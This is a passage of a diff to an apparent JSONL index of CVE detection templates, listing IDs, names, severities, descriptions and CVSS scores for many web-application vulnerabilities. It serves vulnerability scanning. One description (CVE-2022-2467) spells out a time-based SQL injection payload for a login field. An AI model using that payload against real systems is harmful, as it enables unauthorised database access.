templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the newpassword1 parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40971.yaml"} +{"ID":"CVE-2021-40972","Info":{"Name":"Spotweb \u003c= 1.5.1 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the mail parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40972.yaml"} +{"ID":"CVE-2021-40973","Info":{"Name":"Spotweb \u003c= 1.5.1 - Cross Site Scripting","Severity":"medium","Description":"Cross-site scripting (XSS) vulnerability in templates/installer/step-004.inc.php in spotweb 1.5.1 and below allow remote attackers to inject arbitrary web script or HTML via the lastname parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-40973.yaml"} {"ID":"CVE-2021-40978","Info":{"Name":"MKdocs 1.2.2 - Directory Traversal","Severity":"high","Description":"The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-40978.yaml"} {"ID":"CVE-2021-41174","Info":{"Name":"Grafana 8.0.0 \u003c= v.8.2.2 - Angularjs Rendering Cross-Site Scripting","Severity":"medium","Description":"Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-41174.yaml"} {"ID":"CVE-2021-41192","Info":{"Name":"Redash Setup Configuration - Default Secrets Disclosure","Severity":"medium","Description":"Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions \u003c=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2021/CVE-2021-41192.yaml"} @@ -1304,11 +1343,13 @@ {"ID":"CVE-2021-43496","Info":{"Name":"Clustering Local File Inclusion","Severity":"high","Description":"Clustering master branch as of commit 53e663e259bcfc8cdecb56c0bb255bd70bfcaa70 is affected by a directory traversal vulnerability. This attack can cause the disclosure of critical secrets stored anywhere on the system and can significantly aid in getting remote code access.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43496.yaml"} {"ID":"CVE-2021-43510","Info":{"Name":"Sourcecodester Simple Client Management System 1.0 - SQL Injection","Severity":"critical","Description":"Sourcecodester Simple Client Management System 1.0 contains a SQL injection vulnerability via the username field in login.php. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-43510.yaml"} {"ID":"CVE-2021-43574","Info":{"Name":"Atmail 6.5.0 - Cross-Site Scripting","Severity":"medium","Description":"Atmail 6.5.0 contains a cross-site scripting vulnerability in WebAdmin Control Pane via the format parameter to the default URI, which allows remote attackers to inject arbitrary web script or HTML via the “format” parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-43574.yaml"} +{"ID":"CVE-2021-43725","Info":{"Name":"Spotweb \u003c= 1.5.1 - Cross Site Scripting (Reflected)","Severity":"medium","Description":"There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-43725.yaml"} {"ID":"CVE-2021-43734","Info":{"Name":"kkFileview v4.0.0 - Local File Inclusion","Severity":"high","Description":"kkFileview v4.0.0 is vulnerable to local file inclusion which may lead to a sensitive file leak on a related host.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43734.yaml"} {"ID":"CVE-2021-43778","Info":{"Name":"GLPI plugin Barcode \u003c 2.6.1 - Path Traversal Vulnerability.","Severity":"high","Description":"Barcode is a GLPI plugin for printing barcodes and QR codes. GLPI instances version 2.x prior to version 2.6.1 with the barcode plugin installed are vulnerable to a path traversal vulnerability.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43778.yaml"} {"ID":"CVE-2021-43798","Info":{"Name":"Grafana v8.x - Arbitrary File Read","Severity":"high","Description":"Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a local directory traversal, allowing access to local files. The vulnerable URL path is `\u003cgrafana_host_url\u003e/public/plugins/NAME/`, where NAME is the plugin ID for any installed plugin.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-43798.yaml"} {"ID":"CVE-2021-43810","Info":{"Name":"Admidio - Cross-Site Scripting","Severity":"medium","Description":"A cross-site scripting vulnerability is present in Admidio prior to version 4.0.12. The reflected cross-site scripting vulnerability occurs because redirect.php does not properly validate the value of the url parameter. Through this vulnerability, an attacker is capable to execute malicious scripts.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2021/CVE-2021-43810.yaml"} {"ID":"CVE-2021-44077","Info":{"Name":"Zoho ManageEngine ServiceDesk Plus - Remote Code Execution","Severity":"critical","Description":"Zoho ManageEngine ServiceDesk Plus before 11306, ServiceDesk Plus MSP before 10530, and SupportCenter Plus before 11014 are vulnerable to unauthenticated remote code execution.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44077.yaml"} +{"ID":"CVE-2021-44138","Info":{"Name":"Caucho Resin \u003e=4.0.52 \u003c=4.0.56 - Directory traversal","Severity":"high","Description":"There is a Directory traversal vulnerability in Caucho Resin, as distributed in Resin 4.0.52 - 4.0.56, which allows remote attackers to read files in arbitrary directories via a ; in a pathname within an HTTP request.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2021/CVE-2021-44138.yaml"} {"ID":"CVE-2021-44152","Info":{"Name":"Reprise License Manager 14.2 - Authentication Bypass","Severity":"critical","Description":"Reprise License Manager (RLM) 14.2 does not verify authentication or authorization and allows unauthenticated users to change the password of any existing user.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44152.yaml"} {"ID":"CVE-2021-44228","Info":{"Name":"Apache Log4j2 Remote Code Injection","Severity":"critical","Description":"Apache Log4j2 \u003c=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled.\n","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2021/CVE-2021-44228.yaml"} {"ID":"CVE-2021-44427","Info":{"Name":"Rosario Student Information System Unauthenticated SQL Injection","Severity":"critical","Description":"An unauthenticated SQL injection vulnerability in Rosario Student Information System (aka rosariosis) 8.1 and below allow remote attackers to execute PostgreSQL statements (e.g., SELECT, INSERT, UPDATE, and DELETE) through /Side.php via the syear parameter.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2021/CVE-2021-44427.yaml"} @@ -1369,14 +1410,14 @@ {"ID":"CVE-2022-0482","Info":{"Name":"Easy!Appointments \u003c1.4.3 - Broken Access Control","Severity":"critical","Description":"Easy!Appointments prior to 1.4.3 allows exposure of Private Personal Information to an unauthorized actor via the GitHub repository alextselegidis/easyappointments.\n","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-0482.yaml"} {"ID":"CVE-2022-0535","Info":{"Name":"WordPress E2Pdf \u003c1.16.45 - Cross-Site Scripting","Severity":"medium","Description":"WordPress E2Pdf plugin before 1.16.45 contains a cross-site scripting vulnerability. The plugin does not sanitize and escape some of its settings, even when the unfiltered_html capability is disallowed. An attacker can inject arbitrary script in the browser of an unsuspecting user in the context of the affected site, making it possible to steal cookie-based authentication credentials and launch other attacks.\n","Classification":{"CVSSScore":"4.8"}},"file_path":"http/cves/2022/CVE-2022-0535.yaml"} {"ID":"CVE-2022-0540","Info":{"Name":"Atlassian Jira Seraph - Authentication Bypass","Severity":"critical","Description":"Jira Seraph allows a remote, unauthenticated attacker to bypass authentication by sending a specially crafted HTTP request. This affects Atlassian Jira Server and Data Center versions before 8.13.18, versions 8.14.0 and later before 8.20.6, and versions 8.21.0 and later before 8.22.0. This also affects Atlassian Jira Service Management Server and Data Center versions before 4.13.18, versions 4.14.0 and later before 4.20.6, and versions 4.21.0 and later before 4.22.0.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0540.yaml"} -{"ID":"CVE-2022-0591","Info":{"Name":"Formcraft3 \u003c3.8.28 - Server-Side Request Forgery","Severity":"critical","Description":"Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.","Classification":{"CVSSScore":"9.10"}},"file_path":"http/cves/2022/CVE-2022-0591.yaml"} +{"ID":"CVE-2022-0591","Info":{"Name":"Formcraft3 \u003c3.8.28 - Server-Side Request Forgery","Severity":"critical","Description":"Formcraft3 before version 3.8.2 does not validate the URL parameter in the formcraft3_get AJAX action, leading to server-side request forgery issues exploitable by unauthenticated users.","Classification":{"CVSSScore":"9.1"}},"file_path":"http/cves/2022/CVE-2022-0591.yaml"} {"ID":"CVE-2022-0594","Info":{"Name":"WordPress Shareaholic \u003c9.7.6 - Information Disclosure","Severity":"medium","Description":"WordPress Shareaholic plugin prior to 9.7.6 is susceptible to information disclosure. The plugin does not have proper authorization check in one of the AJAX actions, available to both unauthenticated (before 9.7.5) and authenticated (in 9.7.5) users, allowing them to possibly obtain sensitive information such as active plugins and different versions (PHP, cURL, WP, etc.).","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0594.yaml"} {"ID":"CVE-2022-0595","Info":{"Name":"WordPress Contact Form 7 \u003c1.3.6.3 - Stored Cross-Site Scripting","Severity":"medium","Description":"WordPress Contact Form 7 before 1.3.6.3 contains an unauthenticated stored cross-site scripting vulnerability in the Drag and Drop Multiple File Upload plugin. SVG files can be uploaded by default via the dnd_codedropz_upload AJAX action.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0595.yaml"} {"ID":"CVE-2022-0599","Info":{"Name":"WordPress Mapping Multiple URLs Redirect Same Page \u003c=5.8 - Cross-Site Scripting","Severity":"medium","Description":"WordPress Mapping Multiple URLs Redirect Same Page plugin 5.8 and prior contains a reflected cross-site scripting vulnerability. It does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0599.yaml"} {"ID":"CVE-2022-0653","Info":{"Name":"Wordpress Profile Builder Plugin Cross-Site Scripting","Severity":"medium","Description":"The Profile Builder User Profile \u0026 User Registration Forms WordPress plugin is vulnerable to cross-site scripting due to insufficient escaping and sanitization of the site_url parameter found in the ~/assets/misc/fallback-page.php file which allows attackers to inject arbitrary web scripts onto a pages that executes whenever a user clicks on a specially crafted link by an attacker. This affects versions up to and including 3.6.1..\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0653.yaml"} {"ID":"CVE-2022-0656","Info":{"Name":"uDraw \u003c3.3.3 - Local File Inclusion","Severity":"high","Description":"uDraw before 3.3.3 does not validate the url parameter in its udraw_convert_url_to_base64 AJAX action (available to both unauthenticated and authenticated users) before using it in the file_get_contents function and returning its content base64 encoded in the response. As a result, unauthenticated users could read arbitrary files on the web server (such as /etc/passwd, wp-config.php etc).","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0656.yaml"} {"ID":"CVE-2022-0660","Info":{"Name":"Microweber \u003c1.2.11 - Information Disclosure","Severity":"high","Description":"Microweber before 1.2.11 is susceptible to information disclosure. An error message is generated in microweber/microweber which contains sensitive information while viewing comments from load_module:comments#search=. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-0660.yaml"} -{"ID":"CVE-2022-0678","Info":{"Name":"Packagist \u003c1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0678.yaml"} +{"ID":"CVE-2022-0678","Info":{"Name":"Microweber \u003c1.2.11 - Cross-Site Scripting","Severity":"medium","Description":"Packagist prior to 1.2.11 contains a cross-site scripting vulnerability via microweber/microweber. User can escape the meta tag because the user doesn't escape the double-quote in the $redirectUrl parameter when logging out.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0678.yaml"} {"ID":"CVE-2022-0679","Info":{"Name":"WordPress Narnoo Distributor \u003c=2.5.1 - Local File Inclusion","Severity":"critical","Description":"WordPress Narnoo Distributor plugin 2.5.1 and prior is susceptible to local file inclusion. The plugin does not validate and sanitize the lib_path parameter before being passed into a call to require() via the narnoo_distributor_lib_request AJAX action, and the content of the file is displayed in the response as JSON data. This can also lead to a remote code execution vulnerability depending on system and configuration.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0679.yaml"} {"ID":"CVE-2022-0692","Info":{"Name":"Rudloff alltube prior to 3.0.1 - Open Redirect","Severity":"medium","Description":"An open redirect vulnerability exists in Rudloff/alltube that could let an attacker construct a URL within the application that causes redirection to an arbitrary external domain via Packagist in versions prior to 3.0.1.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0692.yaml"} {"ID":"CVE-2022-0693","Info":{"Name":"WordPress Master Elements \u003c=8.0 - SQL Injection","Severity":"critical","Description":"WordPress Master Elements plugin through 8.0 contains a SQL injection vulnerability. The plugin does not validate and escape the meta_ids parameter of its remove_post_meta_condition AJAX action, available to both unauthenticated and authenticated users, before using it in a SQL statement. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0693.yaml"} @@ -1398,6 +1439,7 @@ {"ID":"CVE-2022-0846","Info":{"Name":"SpeakOut Email Petitions \u003c 2.14.15.1 - SQL Injection","Severity":"critical","Description":"The SpeakOut! Email Petitions WordPress plugin before 2.14.15.1 does not sanitise and escape the id parameter before using it in a SQL statement via the dk_speakout_sendmail AJAX action, leading to an SQL Injection exploitable by unauthenticated users.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0846.yaml"} {"ID":"CVE-2022-0864","Info":{"Name":"UpdraftPlus \u003c 1.22.9 - Cross-Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape the updraft_interval parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting (XSS) vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-0864.yaml"} {"ID":"CVE-2022-0867","Info":{"Name":"WordPress ARPrice \u003c3.6.1 - SQL Injection","Severity":"critical","Description":"WordPress ARPrice plugin prior to 3.6.1 contains a SQL injection vulnerability. It fails to properly sanitize and escape user supplied POST data before being inserted in an SQL statement and executed via an AJAX action. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0867.yaml"} +{"ID":"CVE-2022-0869","Info":{"Name":"nitely/spirit 0.12.3 - Open Redirect","Severity":"medium","Description":"Multiple Open Redirect in GitHub repository nitely/spirit prior to 0.12.3.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-0869.yaml"} {"ID":"CVE-2022-0870","Info":{"Name":"Gogs \u003c0.12.5 - Server-Side Request Forgery","Severity":"medium","Description":"Gogs GitHub repository before 0.12.5 is susceptible to server-side request forgery. An attacker can possibly obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-0870.yaml"} {"ID":"CVE-2022-0885","Info":{"Name":"Member Hero \u003c=1.0.9 - Remote Code Execution","Severity":"critical","Description":"WordPress Member Hero plugin through 1.0.9 is susceptible to remote code execution. The plugin lacks authorization checks and does not validate the a request parameter in an AJAX action, allowing an attacker to call arbitrary PHP functions with no arguments. An attacker can thus execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-0885.yaml"} {"ID":"CVE-2022-0928","Info":{"Name":"Microweber \u003c 1.2.12 - Stored Cross-Site Scripting","Severity":"medium","Description":"Microweber prior to 1.2.12 contains a stored cross-site scripting vulnerability via the Type parameter in the body of POST request, which is triggered by Add/Edit Tax.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-0928.yaml"} @@ -1457,6 +1499,7 @@ {"ID":"CVE-2022-2219","Info":{"Name":"Unyson \u003c 2.7.27 - Cross Site Scripting","Severity":"medium","Description":"The plugin does not sanitise and escape the QUERY_STRING before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting in browsers which do not encode characters\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-2219.yaml"} {"ID":"CVE-2022-22242","Info":{"Name":"Juniper Web Device Manager - Cross-Site Scripting","Severity":"medium","Description":"Juniper Web Device Manager (J-Web) in Junos OS contains a cross-site scripting vulnerability. This can allow an unauthenticated attacker to run malicious scripts reflected off J-Web to the victim's browser in the context of their session within J-Web, which can allow the attacker to steal cookie-based authentication credentials and launch other attacks. This issue affects all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S8; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S4; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R3; 21.4 versions prior to 21.4R2; 22.1 versions prior to 22.1R2.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-22242.yaml"} {"ID":"CVE-2022-22536","Info":{"Name":"SAP Memory Pipes (MPI) Desynchronization","Severity":"critical","Description":"SAP NetWeaver Application Server ABAP, SAP NetWeaver Application Server Java, ABAP Platform, SAP Content Server 7.53 and SAP Web Dispatcher are vulnerable to request smuggling and request concatenation attacks. An unauthenticated attacker can prepend a victim's request with arbitrary data. This way, the attacker can execute functions impersonating the victim or poison intermediary web caches. A successful attack could result in complete compromise of Confidentiality, Integrity and Availability of the system.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22536.yaml"} +{"ID":"CVE-2022-22733","Info":{"Name":"Apache ShardingSphere ElasticJob-UI privilege escalation","Severity":"medium","Description":"Exposure of Sensitive Information to an Unauthorized Actor vulnerability in Apache ShardingSphere ElasticJob-UI allows an attacker who has guest account to do privilege escalation. This issue affects Apache ShardingSphere ElasticJob-UI Apache ShardingSphere ElasticJob-UI 3.x version 3.0.0 and prior versions.\n","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-22733.yaml"} {"ID":"CVE-2022-2290","Info":{"Name":"Trilium \u003c0.52.4 - Cross-Site Scripting","Severity":"medium","Description":"Trilium prior to 0.52.4, 0.53.1-beta contains a cross-site scripting vulnerability which can allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site.","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-2290.yaml"} {"ID":"CVE-2022-22947","Info":{"Name":"Spring Cloud Gateway Code Injection","Severity":"critical","Description":"Applications using Spring Cloud Gateway prior to 3.1.1+ and 3.0.7+ are vulnerable to a code injection attack when the Gateway Actuator endpoint is enabled, exposed and unsecured. A remote attacker could make a maliciously crafted request that could allow arbitrary remote execution on the remote host.","Classification":{"CVSSScore":"10"}},"file_path":"http/cves/2022/CVE-2022-22947.yaml"} {"ID":"CVE-2022-22954","Info":{"Name":"VMware Workspace ONE Access - Server-Side Template Injection","Severity":"critical","Description":"VMware Workspace ONE Access is susceptible to a remote code execution vulnerability due to a server-side template injection flaw. An unauthenticated attacker with network access could exploit this vulnerability by sending a specially crafted request to a vulnerable VMware Workspace ONE or Identity Manager.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-22954.yaml"} @@ -1469,6 +1512,7 @@ {"ID":"CVE-2022-23178","Info":{"Name":"Crestron Device - Credentials Disclosure","Severity":"critical","Description":"An issue was discovered on Crestron HD-MD4X2-4K-E 1.0.0.2159 devices. When the administrative web interface of the HDMI switcher is accessed unauthenticated, user credentials are disclosed that are valid to authenticate to the web interface. Specifically, aj.html sends a JSON document with uname and upassword fields.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-23178.yaml"} {"ID":"CVE-2022-23347","Info":{"Name":"BigAnt Server v5.6.06 - Local File Inclusion","Severity":"high","Description":"BigAnt Server v5.6.06 is vulnerable to local file inclusion.","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-23347.yaml"} {"ID":"CVE-2022-23348","Info":{"Name":"BigAnt Server 5.6.06 - Improper Access Control","Severity":"medium","Description":"BigAnt Server 5.6.06 is susceptible to improper access control. The software utililizes weak password hashes. An attacker can craft a password hash and thereby possibly possibly obtain sensitive information, modify data, and/or execute unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-23348.yaml"} +{"ID":"CVE-2022-23544","Info":{"Name":"MeterSphere \u003c 2.5.0 SSRF","Severity":"medium","Description":"MeterSphere is a one-stop open source continuous testing platform, covering test management, interface testing, UI testing and performance testing. Versions prior to 2.5.0 are subject to a Server-Side Request Forgery that leads to Cross-Site Scripting. A Server-Side request forgery in `IssueProxyResourceService::getMdImageByUrl` allows an attacker to access internal resources, as well as executing JavaScript code in the context of Metersphere's origin by a victim of a reflected XSS. This vulnerability has been fixed in v2.5.0. There are no known workarounds.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-23544.yaml"} {"ID":"CVE-2022-2373","Info":{"Name":"WordPress Simply Schedule Appointments \u003c1.5.7.7 - Information Disclosure","Severity":"medium","Description":"WordPress Simply Schedule Appointments plugin before 1.5.7.7 is susceptible to information disclosure. The plugin is missing authorization in a REST endpoint, which can allow an attacker to retrieve user details such as name and email address.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-2373.yaml"} {"ID":"CVE-2022-2376","Info":{"Name":"WordPress Directorist \u003c7.3.1 - Information Disclosure","Severity":"medium","Description":"WordPress Directorist plugin before 7.3.1 is susceptible to information disclosure. The plugin discloses the email address of all users in an AJAX action available to both unauthenticated and authenticated users.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-2376.yaml"} {"ID":"CVE-2022-23779","Info":{"Name":"Zoho ManageEngine - Internal Hostname Disclosure","Severity":"medium","Description":"Zoho ManageEngine Desktop Central before 10.1.2137.8 exposes the installed server name to anyone. The internal hostname can be discovered by reading HTTP redirect responses.","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-23779.yaml"} @@ -1485,10 +1529,14 @@ {"ID":"CVE-2022-24181","Info":{"Name":"PKP Open Journal Systems 2.4.8-3.3 - Cross-Site Scripting","Severity":"medium","Description":"PKP Open Journal Systems 2.4.8 to 3.3 contains a cross-site scripting vulnerability which allows remote attackers to inject arbitrary code via the X-Forwarded-Host Header.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24181.yaml"} {"ID":"CVE-2022-24223","Info":{"Name":"Atom CMS v2.0 - SQL Injection","Severity":"critical","Description":"AtomCMS v2.0 was discovered to contain a SQL injection vulnerability via /admin/login.php.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24223.yaml"} {"ID":"CVE-2022-24260","Info":{"Name":"VoipMonitor - Pre-Auth SQL Injection","Severity":"critical","Description":"A SQL injection vulnerability in Voipmonitor GUI before v24.96 allows attackers to escalate privileges to the Administrator level.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24260.yaml"} +{"ID":"CVE-2022-24264","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the search_word parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24264.yaml"} +{"ID":"CVE-2022-24265","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/menu/ via the path=component/menu/\u0026menu_filter=3 parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24265.yaml"} +{"ID":"CVE-2022-24266","Info":{"Name":"Cuppa CMS v1.0 - SQL injection","Severity":"high","Description":"Cuppa CMS v1.0 was discovered to contain a SQL injection vulnerability in /administrator/components/table_manager/ via the order_by parameter.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24266.yaml"} {"ID":"CVE-2022-24288","Info":{"Name":"Apache Airflow OS Command Injection","Severity":"high","Description":"Apache Airflow prior to version 2.2.4 is vulnerable to OS command injection attacks because some example DAGs do not properly sanitize user-provided parameters, making them susceptible to OS Command Injection from the web UI.","Classification":{"CVSSScore":"8.8"}},"file_path":"http/cves/2022/CVE-2022-24288.yaml"} {"ID":"CVE-2022-2462","Info":{"Name":"WordPress Transposh \u003c=1.0.8.1 - Information Disclosure","Severity":"medium","Description":"WordPress Transposh plugin through is susceptible to information disclosure via the AJAX action tp_history, which is intended to return data about who has translated a text given by the token parameter. However, the plugin also returns the user's login name as part of the user_login attribute. If an anonymous user submits the translation, the user's IP address is returned. An attacker can leak the WordPress username of translators and potentially execute other unauthorized operations.\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2022/CVE-2022-2462.yaml"} {"ID":"CVE-2022-2467","Info":{"Name":"Garage Management System 1.0 - SQL Injection","Severity":"critical","Description":"Garage Management System 1.0 contains a SQL injection vulnerability in /login.php via manipulation of the argument username with input 1@a.com' AND (SELECT 6427 FROM (SELECT(SLEEP(5)))LwLu) AND 'hsvT'='hsvT. An attacker can possibly obtain sensitive information from a database, modify data, and/or execute unauthorized administrative operations in the context of the affected site.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-2467.yaml"} {"ID":"CVE-2022-24681","Info":{"Name":"ManageEngine ADSelfService Plus \u003c6121 - Stored Cross-Site Scripting","Severity":"medium","Description":"ManageEngine ADSelfService Plus before 6121 contains a stored cross-site scripting vulnerability via the welcome name attribute to the Reset Password, Unlock Account, or User Must Change Password screens.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-24681.yaml"} +{"ID":"CVE-2022-24716","Info":{"Name":"Icinga Web 2 - Arbitrary File Disclosure","Severity":"high","Description":"Icinga Web 2 is an open source monitoring web interface, framework and command-line interface. Unauthenticated users can leak the contents of files of the local system accessible to the web-server user, including `icingaweb2` configuration files with database credentials.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2022/CVE-2022-24716.yaml"} {"ID":"CVE-2022-24816","Info":{"Name":"GeoServer \u003c1.2.2 - Remote Code Execution","Severity":"critical","Description":"Programs run on GeoServer before 1.2.2 which use jt-jiffle and allow Jiffle script to be provided via network request are susceptible to remote code execution. The Jiffle script is compiled into Java code via Janino, and executed. In particular, this affects downstream GeoServer 1.1.22.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-24816.yaml"} {"ID":"CVE-2022-24856","Info":{"Name":"Flyte Console \u003c0.52.0 - Server-Side Request Forgery","Severity":"high","Description":"FlyteConsole is the web user interface for the Flyte platform. FlyteConsole prior to version 0.52.0 is vulnerable to server-side request forgery when FlyteConsole is open to the general internet. An attacker can exploit any user of a vulnerable instance to access the internal metadata server or other unauthenticated URLs. Passing of headers to an unauthorized actor may occur.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-24856.yaml"} {"ID":"CVE-2022-2486","Info":{"Name":"Wavlink WN535K2/WN535K3 - OS Command Injection","Severity":"critical","Description":"Wavlink WN535K2 and WN535K3 routers are susceptible to OS command injection in an unknown part of the file /cgi-bin/mesh.cgi?page=upgrade via manipulation of the argument key. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.\n","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2022/CVE-2022-2486.yaml"} @@ -1526,11 +1574,16 @@ 